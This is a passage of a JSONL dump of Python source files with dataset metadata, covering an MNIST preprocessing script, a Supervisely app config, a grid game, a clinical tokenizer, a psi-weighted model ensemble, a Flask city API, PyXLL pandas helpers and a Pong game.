starting_position=\"-1\", # \"-1\" is from the beginning of the partition.\n )\n # receive events from specified partition:\n # client.receive(on_event=on_event, partition_id='0')\n","sub_path":"PythonScripts/Receive2.py","file_name":"Receive2.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"10557356","text":"from tensorflow.examples.tutorials.mnist import input_data\nimport pickle\nimport os\nfrom keras.utils import np_utils\n\n\nclass Data:\n def __init__(self,\n mnist_data,\n train_x,\n train_y,\n test_x,\n test_y):\n self.mnist_data = mnist_data\n self.train_x = train_x\n self.train_y = train_y\n self.test_x = test_x\n self.test_y = test_y\n\n\nclass PretreatMgr:\n def extract(self):\n mnist_data = input_data.read_data_sets('data', one_hot=True)\n train_x, train_y = mnist_data.train.images, mnist_data.train.labels\n test_x, test_y = mnist_data.test.images, mnist_data.test.labels\n train_x = train_x.reshape(-1, 28, 28, 1) / 255\n test_x = test_x.reshape(-1, 28, 28, 1) / 255\n return Data(mnist_data, train_x, train_y, test_x, test_y)\n\n def save(self):\n if os.path.exists(\"data/data.pkl\"):\n os.remove(\"data/data.pkl\")\n file = open('data/data.pkl', 'wb')\n pickle.dump(self.extract(), file)\n\n def restore(self):\n file = open('data/data.pkl', 'rb')\n return pickle.load(file)\n\n\nif __name__ == '__main__':\n mgr = PretreatMgr()\n mgr.save()\n","sub_path":"deep_learning/digital_classify/pretreat.py","file_name":"pretreat.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"144415952","text":"import os\nfrom pathlib import Path\nimport sys\nimport supervisely_lib as sly\nfrom supervisely_lib.io.fs import mkdir\n\nmy_app = sly.AppService()\napi = my_app.public_api\ntask_id = my_app.task_id\n\nlogger = sly.logger\n\nmodel = None\ndevice = 'cuda'\n\nteam_id = int(os.environ['context.teamId'])\nworkspace_id = int(os.environ['context.workspaceId'])\nproject_id = int(os.environ['modal.state.slyProjectId'])\n\ndownload_batch_size = 10\ncalc_batch_size = 10\ngallery_data = None\n\nproject_info = api.project.get_info_by_id(project_id)\nif project_info is None: # for debug\n raise ValueError(f\"Project with id={project_id} not found\")\n\nproject_dir = os.path.join(my_app.data_dir, \"visualize_MLTask\")\ntemp_files = os.path.join(project_dir, \"temp_files\")\n\nif os.path.exists(temp_files): # clean temp\n sly.fs.clean_dir(temp_files)\n\nconverted_dir = os.path.join(temp_files, \"converted_input\")\nsly.fs.mkdir(converted_dir)\n\nprojects_dir = os.path.join(temp_files, \"projects\")\nsly.fs.mkdir(projects_dir)\ncheckpoints_dir = os.path.join(temp_files, \"checkpoints\")\nsly.fs.mkdir(checkpoints_dir)\nlocal_info_dir = os.path.join(temp_files, \"info\")\nsly.fs.mkdir(local_info_dir)\n\nproject_dir = os.path.join(my_app.data_dir, \"sly_project\")\nproject_meta = sly.ProjectMeta.from_json(api.project.get_meta(project_id))\n\nartifacts_dir = os.path.join(my_app.data_dir, \"artifacts\")\nsly.fs.mkdir(artifacts_dir)\ninfo_dir = os.path.join(artifacts_dir, \"info\")\nsly.fs.mkdir(info_dir)\ncheckpoints_dir = os.path.join(artifacts_dir, \"checkpoints\")\nsly.fs.mkdir(checkpoints_dir)\n\n\nembeddings_dir = os.path.join(artifacts_dir, \"embeddings\")\nsly.fs.mkdir(embeddings_dir)\nsly.fs.clean_dir(embeddings_dir)\n\nroot_source_dir = str(Path(sys.argv[0]).parents[1])\nsly.logger.info(f\"Root source directory: {root_source_dir}\")\nsys.path.append(root_source_dir)\n\n\nsys.path.append(os.path.join(root_source_dir, 'src'))\nsys.path.append(os.path.join(str(Path(sys.argv[0]).parents[2]), 'calculator'))\nsys.path.append(os.path.join(str(Path(sys.argv[0]).parents[3]), 'src'))\n\nsource_path = str(Path(sys.argv[0]).parents[0])\nsly.logger.info(f\"App source directory: {source_path}\")\nsys.path.append(source_path)\n\nui_sources_dir = os.path.join(source_path, \"ui\")\nsly.logger.info(f\"UI source directory: {ui_sources_dir}\")\nsys.path.append(ui_sources_dir)\nsly.logger.info(f\"Added to sys.path: {ui_sources_dir}\")\n\npascal_contour_color = [224, 224, 192]\nselected_classes = []\nclass_color_dict = {}\n\n# code for export-to-coco\n# user = api.user.get_info_by_id(user_id)\nuser_name = \"Supervisely\"\nproject = api.project.get_info_by_id(project_id)\nmeta_json = api.project.get_meta(project_id)\nmeta = sly.ProjectMeta.from_json(meta_json)\n\n# # embedding calculator\n# local_dataset_path = os.path.join(my_app.data_dir, 'sly_dataset')\n# remote_weights_path = os.environ['modal.state.slyFile']\n# remote_embeddings_dir = os.environ['modal.state.slyEmbeddingsDir']\n","sub_path":"supervisely/visualization/src/sly_globals.py","file_name":"sly_globals.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"253198079","text":"import numpy as np\nimport random\nimport itertools\nimport os\n\nfrom objects import GameObj, Car, Obstacle, Bunker, Target\n\nclass Game:\n def __init__(self, width, height, obs, bun, show_game=True):\n self.width = width\n self.height = height\n self.show_game = show_game\n self.num_of_obstacles = obs\n self.num_of_bunkers = bun\n\n self.car = None\n self.target = Target(width, height)\n self.obstacles = None\n self.bunkers = None\n\n self.total_reward = 0.\n self.current_reward = 0.\n self.total_game = 0\n self.total_success = 0\n\n def _get_state(self):\n cstate = np.zeros((self.width, self.height))\n vstate = np.zeros((self.width, self.height))\n hstate = np.zeros((self.width, self.height))\n bstate = np.zeros((self.width, self.height))\n# mstate = np.zeros((self.width, self.height))\n\n cstate[self.car.row, self.car.col] = 1\n for o in self.obstacles:\n if o.dr != 0:\n vstate[o.row, o.col] = 1\n else:\n hstate[o.row, o.col] = 1\n for b in self.bunkers:\n bstate[b.row, b.col] = 1\n# for r in range(self.height):\n# for c in range(self.width):\n# if r + c <= self.car.max:\n# mstate[r, c] = 1\n# else:\n# break\n\n r = np.append(cstate, vstate, axis=0)\n r = np.append(r, hstate, axis=0)\n r = np.append(r, bstate, axis=0)\n# r = np.append(r, mstate, axis=0)\n return r\n\n def _draw_screen(self):\n os.system(\"clear\")\n\n title = str(self.total_success) + \" SUCCESSES / \" + str(self.total_game) + \" GAMES\"\n print(title)\n\n for r in range(self.height):\n for c in range(self.width):\n pos = GameObj(r, c)\n\n if self.car.row == r and self.car.col == c:\n print(\"o\", end=\"\")\n elif self.target.row == r and self.target.col == c:\n print(\"O\", end=\"\")\n elif list(filter(lambda o: o.same_pos(pos), self.obstacles)):\n print(\"X\", end=\"\")\n elif list(filter(lambda b: b.same_pos(pos), self.bunkers)):\n print(\"B\", end=\"\")\n else:\n print(\"_\", end=\"\")\n print()\n\n if self._is_gameover():\n print(\"GAME OVER!!\")\n elif self._is_success():\n print(\"SUCCESS!!\")\n\n def reset(self):\n self.steps = 0\n self.current_reward = 0\n self.total_game += 1\n\n self.car = Car()\n self.obstacles = []\n self.bunkers = []\n \n l = list(itertools.product(range(self.height), range(self.width)))\n random.shuffle(l)\n i = 0\n n = 0\n while n < self.num_of_obstacles + self.num_of_bunkers:\n r, c = l[i]\n if (r == 0 and c == 0) or (r == self.height - 1 and c == self.width - 1):\n pass\n else:\n if n < self.num_of_obstacles:\n self.obstacles.append(Obstacle(r, c))\n else:\n self.bunkers.append(Bunker(r, c))\n n += 1\n i += 1\n\n return self._get_state()\n\n def _update_car(self, action):\n return self.car.move(action, self.width, self.height)\n\n def _update_obstacles(self):\n objs = self.bunkers + [self.target]\n for o in self.obstacles:\n o.move(self.width, self.height, objs)\n\n def _is_gameover(self):\n return list(filter(lambda o: o.same_pos(self.car), self.obstacles))\n\n def _is_success(self):\n return self.car.same_pos(self.target)\n\n def step(self, action):\n move_reward = self._update_car(action)\n gameover = self._is_gameover()\n success = self._is_success()\n\n if (not gameover) and (not success):\n self._update_obstacles()\n gameover = self._is_gameover()\n\n if gameover:\n reward = -(self.height + self.width)\n elif success:\n self.total_success += 1\n reward = (self.height + self.width)\n else:\n reward = move_reward\n self.current_reward += reward\n\n end = gameover or success\n if end:\n self.total_reward += self.current_reward\n\n if self.show_game:\n self._draw_screen()\n\n return self._get_state(), reward, end, success\n","sub_path":"traffic/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"476749085","text":"import nltk\n\nfrom nltk.tokenize.punkt import PunktSentenceTokenizer, PunktParameters, PunktLanguageVars\nfrom nltk.tokenize.treebank import TreebankWordTokenizer\n\nfrom clinical_tokenizers import ClinicalSentenceTokenizer, IndexTokenizer\n\nfrom PyRuSH.RuSH import RuSH\n\nclass CustomSentenceBreakingLangVars(PunktLanguageVars):\n mything = 'something'\n # this does nothing -- these must be changed after construction\n #send_end_chars = ('.', '!')\n\ndef build_n2c2_tokenizer(keep_token_strings = False, enable_pyrush_sentence_tokenizer = False, disable_custom_preprocessing = True):\n print('Building n2c2 tokenizer...')\n cs_preprocess_split_re_strings = []\n # double newlines\n cs_preprocess_split_re_strings.append(r'[\\r\\n]{2,}')\n # newlines with only spaces\n cs_preprocess_split_re_strings.append(r'[\\r\\n]+\\s+[\\r\\n]+')\n # numbered lists (e.g. \"1.\", \"2)\")\n cs_preprocess_split_re_strings.append(r'(^|\\r|\\n)+\\s*\\d+[.)-]')\n # bulleted lists (e.g.\"*\", \"-\")\n cs_preprocess_split_re_strings.append(r'(^|\\r|\\n)+\\s*[*-]')\n # starting labels (e.g. \"WEIGHT:\")\n cs_preprocess_split_re_strings.append(r'(^|\\r|\\n)+\\s*\\w+[:]')\n # break up other lines separated by dates\n cs_preprocess_split_re_strings.append(r'(^|\\r|\\n)+\\s*\\d{1,2}[/-]\\d{1,2}[/-]\\d{2,4}')\n # MIMIC has many lines that start with this [**YYYY-M-DD**]\n cs_preprocess_split_re_strings.append(r'^\\[\\*+\\d{4}-\\d{1,2}-\\d{1,2}\\*+\\]')\n # TIU notes have long bars like this : '***********' or '===========' or '------'\n cs_preprocess_split_re_strings.append(r'[*=-]{3,}')\n \n # NOTE : This breaking rule was disabled 2-13-18 since the UMass MADE challenge data often ended each line with 2 spaces and a \n # newline which caused this aggressive rule to fire over and over again.\n # aggressively break anything with lots of spaces (tabular data)\n #cs_preprocess_split_re_strings.append(r'\\s{3,}')\n \n \n custom_lang_vars = CustomSentenceBreakingLangVars()\n custom_lang_vars.sent_end_chars = ('.', '!')\n print(custom_lang_vars.sent_end_chars)\n\n punkt_tokenizer2 = PunktSentenceTokenizer(lang_vars = custom_lang_vars)\n treebank_tokenizer = TreebankWordTokenizer()\n\n # looks like \"pt.\" and \"D.R.\" and \"P.R.\" are already being handled\n #punkt_tokenizer2._params.abbrev_types.update(extra_abbrev) \n \n sentence_tokenizer = None\n if enable_pyrush_sentence_tokenizer:\n print('Enabling PyRuSH for sentence tokenization...')\n pyrush_sentence_tokenizer = RuSH('resources/PyRuSH/conf/rush_rules.tsv')\n sentence_tokenizer = pyrush_sentence_tokenizer\n else:\n print('Enabling NLTK Punkt for sentence tokenization...')\n sentence_tokenizer = punkt_tokenizer2\n \n print('Type of sentence tokenizer : {}'.format(type(sentence_tokenizer)))\n \n enabled_preprocessing_expressions = []\n if not disable_custom_preprocessing:\n print('Enabling custom preprocessing expressions. Total : {}'.format(len(cs_preprocess_split_re_strings)))\n enabled_preprocessing_expressions = cs_preprocess_split_re_strings\n else:\n print('Not allowing custom preprocessing expressions...')\n \n cs_tokenizer = ClinicalSentenceTokenizer(default_sentence_tokenizer = sentence_tokenizer, preprocess_split_re_strs = enabled_preprocessing_expressions)\n\n index_tokenizer = IndexTokenizer(cs_tokenizer, treebank_tokenizer, keep_token_strings = keep_token_strings)\n \n return index_tokenizer\n","sub_path":"n2c2_tokenizer.py","file_name":"n2c2_tokenizer.py","file_ext":"py","file_size_in_byte":3495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"497088612","text":"import logging\nimport multiprocessing as mp\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom codem.ensemble.PV import rmse_out_map, trend_out_map\n\nlogger = logging.getLogger(__name__)\n\n\ndef rank_array(array):\n \"\"\"\n (array) -> array\n Rank each value in an array from 1 to N where N is the number of elements in\n the array with the lowest value is one and the highest value is N.\n \"\"\"\n temp = array.argsort()\n ranks = np.empty(len(array), int)\n ranks[temp] = np.arange(len(array))\n return ranks\n\n\ndef gangnam_weight(ranked_array, psi, cutoff):\n \"\"\"\n (array of integers, float, int) -> array\n\n Given an array of ranks assigns a psi value to each element in the array\n corresponding to the rank of the element. The higher the rank (the closer to\n one the rank is) the higher the psi weight it will receive. Any value above\n teh cutoff value will receive a value of zero. The returned array should sum\n to one.\n \"\"\"\n N = min([len(ranked_array), 100])\n denominator = float(sum(psi**(N - ranked_array)))\n psi_weighted = psi**(N-ranked_array) / denominator\n psi_weighted *= (ranked_array <= cutoff)\n return psi_weighted\n\n\ndef psi_weights(space_err, lin_err, psi, cutoff):\n \"\"\"\n (array, array, float, int) -> tuple of 2 arrays\n\n Given two equal length arrays of values corresponding to the error of space\n time models and error of linear models alongside a psi value by which to\n weight the models returns two arrays with the corresponding psi weight for\n each model such that the sum of the two arrays should add to one. The first\n array should be applied to the space time models while the second should be\n applied to the linear models.\n \"\"\"\n array = np.append(space_err, lin_err)\n ranks = rank_array(array)\n psi_values = gangnam_weight(ranks, psi, cutoff)\n M = int(len(psi_values) / 2)\n return psi_values[:M], psi_values[M:]\n\n\ndef psi_draws(space_err, lin_err, psi, cutoff):\n \"\"\"\n (array, array, float, int) -> tuple of 2 arrays\n\n Given two equal length arrays of values corresponding to the error of space\n time models and error of linear models alongside a psi value by which to\n weight the models returns two arrays with the corresponding number of draws\n for each model such that the sum of the two arrays should add to one. The\n first array should be applied to the space time models while the second\n should be applied to the linear models.\n \"\"\"\n array = np.append(space_err, lin_err)\n ranks = rank_array(array)\n psi_values = gangnam_weight(ranks, psi, cutoff)\n draws = (psi_values * 1000).astype(int)\n leftover = 1000 - sum(draws)\n draws[np.argmax(draws)] += leftover\n M = int(len(psi_values) / 2)\n ranks = 1 + np.array(ranks)\n return draws[:M], draws[M:], ranks[:M], ranks[M:]\n\n\ndef psi_predict(space_pred, lin_pred, space_err, lin_err, psi, cutoff):\n \"\"\"\n (array, array, array, array, float, int) -> array\n\n Given the prediction estimations for models with the same knockout pattern\n apply weights to each model and use the ensemble of the models to make\n predictions. Just like Netflix.\n \"\"\"\n logger.info(f\"Make psi-predictions using means for psi value {psi}\")\n space_weights, lin_weights = psi_weights(space_err, lin_err, psi, cutoff)\n space_weights = space_weights\n lin_weights = lin_weights\n new_pred = (space_pred * space_weights) + (lin_pred * lin_weights)\n return new_pred.sum(axis=1)\n\n\ndef psi_range(space_pred, lin_pred, space_err, lin_err, psi_values, cutoff):\n \"\"\"\n (array, array, array, array, array, int) -> array\n\n Make ensemble predictions using a range of psi values. Returns an array of\n values with a number of rows equal to the number of observations in\n space_pred and lin_pred and a number of columns equal to the number of\n values in psi range.\n \"\"\"\n psi_pred = np.array(\n [psi_predict(\n space_pred, lin_pred, space_err, lin_err, x, cutoff\n ) for x in psi_values]\n )\n return psi_pred.T\n\n\ndef psi_map(inputs):\n \"\"\"\n (list) -> array\n\n Helper function that allows for a parallelized version of psi ensemble\n prediction across all knockout patterns.\n \"\"\"\n space_pred, lin_pred, space_err, lin_err, psi_values, cutoff = inputs\n p = psi_range(space_pred, lin_pred, space_err, lin_err, psi_values, cutoff)\n return p\n\n\ndef ensemble_all(space_models, linear_models, psi_values, cutoff):\n \"\"\"\n (all_model, all_model, array, int) -> list of arrays\n\n Generate the ensemble predictions across al knockouts for various values of\n psi.\n \"\"\"\n logger.info(\"Generating ensemble predictions across all knockouts for various \"\n \"values of psi using just means * weights.\")\n inputs = [(space_models.all_models[i].pred_mat,\n linear_models.all_models[i].pred_mat, space_models.RMSE +\n space_models.trend, linear_models.RMSE + linear_models.trend,\n psi_values, cutoff)\n for i in range(len(space_models.all_models) - 1)]\n p = mp.Pool(20)\n ensemble_predictions = np.array(list(p.map(psi_map, tqdm(inputs))))\n p.close()\n p.join()\n return ensemble_predictions\n\n\ndef rmse_ensemble_out(list_of_preds, data_frame, knockouts):\n \"\"\"\n (list of model_lists, data frame, list of data frames) ->\n array\n\n Calculate the RMSE of all ensembles across all knockout patterns and\n average the results to be used for ranking at a later time. An array of\n length equal to the number of psi_values is is returned with the median\n RMSE.\n \"\"\"\n logger.info(\"Calculating OOS RMSE for ensembles with different psi values.\")\n inputs = [(data_frame, knockouts[i], list_of_preds[i])\n for i in range(len(list_of_preds))]\n p = mp.Pool(20)\n rmse_all = np.array(list(p.map(rmse_out_map, tqdm(inputs))))\n p.close()\n p.join()\n return np.median(rmse_all, axis=0)\n\n\ndef trend_ensemble_out(list_of_preds, data_frame, knockouts, window):\n \"\"\"\n (list of model_lists, data frame, list of data frames, list of str) ->\n array\n\n Calculate the trend of all ensembles across all knockout patterns and\n average the results to be used for ranking at a later time. An array of\n length equal to the number of psi_values is is returned with the median\n trend.\n \"\"\"\n logger.info(\"Calculating OOS trend for ensembles with different psi values.\")\n inputs = [(data_frame, knockouts[i], list_of_preds[i], window)\n for i in range(len(list_of_preds))]\n p = mp.Pool(20)\n trend_all = np.array(list(p.map(trend_out_map, tqdm(inputs))))\n p.close()\n p.join()\n return np.median(trend_all, axis=0)\n\n\ndef best_psi(data_frame, knockouts, window, space_models, linear_models, psi_values, cutoff):\n \"\"\"\n (data frame, list of dfs, int, all_model, all_model, array, int) -> float\n\n Get the best value of psi using the median value across all knockouts.\n \"\"\"\n logger.info(\"Getting the best psi value using median rmse and trend error across all knockouts.\")\n ens_preds = ensemble_all(space_models, linear_models, psi_values, cutoff)\n rmse = rmse_ensemble_out(ens_preds, data_frame, knockouts)\n trend = trend_ensemble_out(ens_preds, data_frame, knockouts, window)\n best_rmse = rmse[np.argmin(rmse + trend)]\n best_trend = trend[np.argmin(rmse + trend)]\n psi = psi_values[np.argmin(rmse + trend)]\n d1, d2, r1, r2 = psi_draws(space_models.RMSE + space_models.trend,\n linear_models.RMSE + linear_models.trend, psi, cutoff)\n return psi, d1, d2, best_rmse, best_trend, r1, r2\n","sub_path":"gbd_2019/shared_code/central_comp/cod/codem/codem/ensemble/gangnam_style.py","file_name":"gangnam_style.py","file_ext":"py","file_size_in_byte":7665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"291080072","text":"#!/usr/bin/python3\n\"\"\"\nThis file contains the City module\n\"\"\"\nfrom api.v1.views import app_views\nfrom flask import jsonify, abort, request, make_response\nfrom models import storage\nfrom models.state import State\nfrom models.city import City\nfrom flasgger.utils import swag_from\n\n\n@app_views.route('/states//cities',\n methods=['GET'], strict_slashes=False)\n@swag_from('documentation/city/get.yml', methods=['GET'])\ndef get_cities(state_id):\n \"\"\" Gets cities for state_id \"\"\"\n state = storage.get(State, state_id)\n if state is None:\n abort(404)\n list_cities = [obj.to_dict() for obj in state.cities]\n return jsonify(list_cities)\n\n\n@app_views.route('/cities/', methods=['GET'],\n strict_slashes=False)\n@swag_from('documentation/city/get_id.yml', methods=['GET'])\ndef get_city(city_id):\n \"\"\" get city by id\"\"\"\n city = storage.get(City, city_id)\n if city is None:\n abort(404)\n return jsonify(city.to_dict())\n\n\n@app_views.route('/cities/', methods=['DELETE'],\n strict_slashes=False)\n@swag_from('documentation/city/delete.yml', methods=['DELETE'])\ndef del_city(city_id):\n \"\"\" delete city by id\"\"\"\n city = storage.get(City, city_id)\n if city is None:\n abort(404)\n city.delete()\n storage.save()\n return jsonify({})\n\n\n@app_views.route('/states//cities', methods=['POST'],\n strict_slashes=False)\n@swag_from('documentation/city/post.yml', methods=['POST'])\ndef create_obj_city(state_id):\n \"\"\" create new instance \"\"\"\n state = storage.get(State, state_id)\n if state is None:\n abort(404)\n if not request.get_json():\n return make_response(jsonify({\"error\": \"Not a JSON\"}), 400)\n if 'name' not in request.get_json():\n return make_response(jsonify({\"error\": \"Missing name\"}), 400)\n\n js = request.get_json()\n obj = City(**js)\n obj.state_id = state.id\n obj.save()\n return jsonify(obj.to_dict()), 201\n\n\n@app_views.route('/cities/', methods=['PUT'],\n strict_slashes=False)\n@swag_from('documentation/city/put.yml', methods=['PUT'])\ndef post_city(city_id):\n \"\"\" \"\"\"\n if not request.get_json():\n return make_response(jsonify({\"error\": \"Not a JSON\"}), 400)\n obj = storage.get(City, city_id)\n if obj is None:\n abort(404)\n for key, value in request.get_json().items():\n if key not in ['id', 'state_id', 'created_at', 'updated_at']:\n setattr(obj, key, value)\n storage.save()\n return jsonify(obj.to_dict())\n","sub_path":"api/v1/views/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"509871412","text":"\"\"\"\nPyXLL Examples: Pandas\n\nThis module contains example functions that show how pandas DataFrames and Series\ncan be passed to and from Excel to Python functions using PyXLL.\n\nPandas needs to be installed for this example to work correctly.\n\nSee also the included examples.xlsx file.\n\"\"\"\nfrom pyxll import xl_func\n\n@xl_func(volatile=True)\ndef pandas_is_installed():\n \"\"\"returns True if pandas is installed\"\"\"\n try:\n import pandas\n return True\n except ImportError:\n return False\n\n@xl_func(\"int, int: dataframe\", auto_resize=True)\ndef random_dataframe(rows, columns):\n \"\"\"\n Creates a DataFrame of random numbers.\n\n :param rows: Number of rows to create the DataFrame with.\n :param columns: Number of columns to create the DataFrame with.\n \"\"\"\n import pandas as pa\n import numpy as np\n\n data = np.random.rand(rows, columns)\n column_names = [chr(ord('A') + x) for x in range(columns)]\n df = pa.DataFrame(data, columns=column_names)\n\n return df\n\n@xl_func(\"dataframe, float[], str[], str[]: dataframe\", auto_resize=True)\ndef describe_dataframe(df, percentiles=[], include=[], exclude=[]):\n \"\"\"\n Generates descriptive statistics that summarize the central tendency, dispersion and shape of a dataset's\n distribution, excluding NaN values.\n\n :param df: DataFrame to describe.\n :param percentiles: The percentiles to include in the output. All should fall between 0 and 1.\n :param include: dtypes to include.\n :param exclude: dtypes to exclude.\n :return:\n \"\"\"\n # filter out any blanks\n percentiles = list([_f for _f in percentiles if _f])\n include = list([_f for _f in include if _f])\n exclude = list([_f for _f in exclude if _f])\n\n return df.describe(percentiles=percentiles or None,\n include=include or None,\n exclude=exclude or None)\n","sub_path":"examples/pandas_example.py","file_name":"pandas_example.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"243622990","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Importacion de los módulos\nimport pygame\nfrom pygame.locals import *\nimport os\nimport sys\n\n# ----------------------------------------------\n# Constantes, como anchos y largo de pantalla, etc.\n# ----------------------------------------------\n\nSCREEN_WIDTH = 626\nSCREEN_HEIGHT = 470\nFULLSCREEN_WIDTH = 626\nFULLSCREEN_HEIGHT = 470\nLINE_HEIGHT = 50\nSCORE_LIMIT = 2\nCUP_WIDTH = 182\nCUP_HEIGHT = 193\nIMG_DIR = \"img\"\nSND_DIR = \"snd\"\n\n# ----------------------------------------------\n# Clases y Funciones utilizadas\n# ----------------------------------------------\n\ndef load_image(nombre, dir_imagen, alpha=False):\n # Encontramos la ruta completa de la imagen\n ruta = os.path.join(dir_imagen, nombre)\n try:\n image = pygame.image.load(ruta)\n except:\n print(\"Error, no se puede cargar la imagen: \" + ruta)\n sys.exit(1)\n # Comprobar si la imagen tiene \"canal alpha\" (ej: png)\n if alpha is True:\n image = image.convert_alpha()\n else:\n image = image.convert()\n return image\n\ndef load_sound(nombre, dir_sonido):\n ruta = os.path.join(dir_sonido, nombre)\n # Intentar cargar el sonido\n try:\n\t sonido = pygame.mixer.Sound(ruta)\n except (pygame.error) as message:\n\t print (\"No se pudo cargar el sonido:\", ruta)\n\t sonido = None\n return sonido\n\n# ----------------------------------------------\n# Sprites (clases) de los objetos del juego\n# ----------------------------------------------\n\nclass Pelota(pygame.sprite.Sprite):\n \"La bola y su comportamiento en la pantalla\"\n \n def __init__(self):\n\t pygame.sprite.Sprite.__init__(self)\n\t self.image = load_image(\"bola.png\", IMG_DIR, True)\n\t self.rect = self.image.get_rect()\n\t #self.rect.centerx = SCREEN_WIDTH/2\n\t #self.rect.centery = SCREEN_HEIGHT/2\n\t self.rect.centerx = FULLSCREEN_WIDTH/2\n\t self.rect.centery = FULLSCREEN_HEIGHT/2\n\t self.speed = [4, 3]\n\n def update(self, marcador, sonido_punto=None):\n \"\"\"if self.rect.left < 0 or self.rect.right > SCREEN_WIDTH:\n\t self.speed[0] = -self.speed[0]\n\t sonido_punto.play()\n\t self.rect.centerx = SCREEN_WIDTH / 2\n\t self.rect.centery = SCREEN_HEIGHT / 2\n if self.rect.top < 0 or self.rect.bottom > SCREEN_HEIGHT:\n self.speed[1] = -self.speed[1]\"\"\"\n if self.rect.left < 0 or self.rect.right > FULLSCREEN_WIDTH:\n\t self.speed[0] = -self.speed[0]\n\t if self.rect.left < 0:\n\t marcador.punto2()\n\t self.speed[0] += 1\n\t #punto del jugador 2\n\t else:\n\t marcador.punto1()\n\t self.speed[0] += 1\n\t\t\t #punto del jugador 1\n\t sonido_punto.play()\n\t self.rect.centerx = FULLSCREEN_WIDTH / 2 - 11\n\t self.rect.centery = FULLSCREEN_HEIGHT / 2 - 11\n if self.rect.top < LINE_HEIGHT or self.rect.bottom > FULLSCREEN_HEIGHT:\n self.speed[1] = -self.speed[1]\n self.rect.move_ip((self.speed[0], self.speed[1]))\n \n def ganador(self):\n\t x = load_image(\"cup.png\", IMG_DIR, True)\n\t self.image = pygame.transform.smoothscale(x, (CUP_WIDTH, CUP_HEIGHT))\n\t self.rect.centerx = (FULLSCREEN_WIDTH - CUP_WIDTH)/2\n\t self.rect.centery = (FULLSCREEN_HEIGHT - CUP_HEIGHT)/2\n \n def colision(self, objetivo, sonido_golpe=None):\n\t if self.rect.colliderect(objetivo.rect):\n\t\t self.speed[0] = -self.speed[0]\n\t\t sonido_golpe.play()\n\nclass Marcador():\n\tdef __init__(self):\n\t\tself.jugador1 = 0\n\t\tself.jugador2 = 0\n\t\tself.ganador = 0\n\t\n\tdef punto1(self):\n\t\tself.jugador1 += 1\n\t\tif (self.jugador1 > SCORE_LIMIT-1):\n\t\t\tself.ganador = 1\n\t\t\t#El jugador 1 ganó\n\t\n\tdef punto2(self):\n\t\tself.jugador2 += 1\n\t\tif (self.jugador2 > SCORE_LIMIT-1):\n\t\t\tself.ganador = 2\n\t\t\t#El jugador 2 ganó\n\t\t\t\nclass Paleta(pygame.sprite.Sprite):\n \"Define el comportamiento de las paletas de ambos jugadores\"\n \n def __init__(self, x, type=1):\n\t pygame.sprite.Sprite.__init__(self)\n\t if (type == 1):\n\t self.image = load_image(\"paddle1.png\", IMG_DIR, True)\n\t else:\n\t self.image = load_image(\"paddle2.png\", IMG_DIR, True)\n\t self.rect = self.image.get_rect()\n\t self.rect.centerx = x\n\t \"\"\"self.rect.centery = SCREEN_HEIGHT/2\"\"\"\n\t self.rect.centery = FULLSCREEN_HEIGHT/2\n\n def humano(self):\n\t # control de que la paleta no salga de la pantalla\n \"\"\"if self.rect.bottom >= SCREEN_HEIGHT:\n\t self.rect.bottom = SCREEN_HEIGHT\"\"\"\n if self.rect.bottom >= FULLSCREEN_HEIGHT:\n\t self.rect.bottom = FULLSCREEN_HEIGHT\n elif self.rect.top <= LINE_HEIGHT:\n self.rect.top = LINE_HEIGHT\n \n def cpu(self, pelota):\n\t self.speed = [0, 3]\n\t #if pelota.speed[0] >= 0 and pelota.rect.centerx >= SCREEN_WIDTH / 2:\n\t if pelota.speed[0] >= 0 and pelota.rect.centerx >= FULLSCREEN_WIDTH / 2:\n\t if (self.rect.centery > pelota.rect.centery) and (self.rect.centery < (FULLSCREEN_HEIGHT - self.speed[1])) :\n\t self.rect.centery -= self.speed[1]\n\t if self.rect.centery < pelota.rect.centery and (self.rect.centery > (self.speed[1])):\n\t self.rect.centery += self.speed[1]\n\t\t \n# ----------------------------------------------\n# Funcion principal del juego\n# ----------------------------------------------\n\ndef main(): \n # creamos la ventana y le indicamos un titulo:\n #screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n screen = pygame.display.set_mode((FULLSCREEN_WIDTH, FULLSCREEN_HEIGHT), FULLSCREEN)\n #screen = pygame.display.set_mode((1500, 780), pygame.FULLSCREEN)\n \n icon = load_image(\"pong_icon.png\", IMG_DIR, True)\n pygame.display.set_icon(icon)\n \n pygame.display.set_caption(\"Pong - Command control\")\n \n fuente = pygame.font.Font(None, 45)\n \n # se cargan los objetos\n fondo = load_image(\"blackParquet.jpg\", IMG_DIR)\n #fondo = pygame.transform.scale(f, (FULLSCREEN_WIDTH, FULLSCREEN_HEIGHT))\n bola = Pelota()\n marcador = Marcador()\n jugador1 = Paleta(25, type=1)\n #jugador2 = Paleta(SCREEN_WIDTH - 25)\n jugador2 = Paleta(FULLSCREEN_WIDTH - 25, type=2)\n sonido_golpe = load_sound(\"tennis.ogg\", SND_DIR)\n sonido_punto = load_sound(\"aplausos.ogg\", SND_DIR)\n \n clock = pygame.time.Clock()\n pygame.key.set_repeat(1, 25) # Activa repeticion de teclas\n pygame.mouse.set_visible(False)\n \n # el bucle principal del juego\n while True:\n\t clock.tick(60)\n\t pos_mouse = pygame.mouse.get_pos()\n\t mov_mouse = pygame.mouse.get_rel()\n\t \n\t jugador1.humano()\n\t jugador2.cpu(bola)\n\t bola.update(marcador, sonido_punto)\n\t \n\t 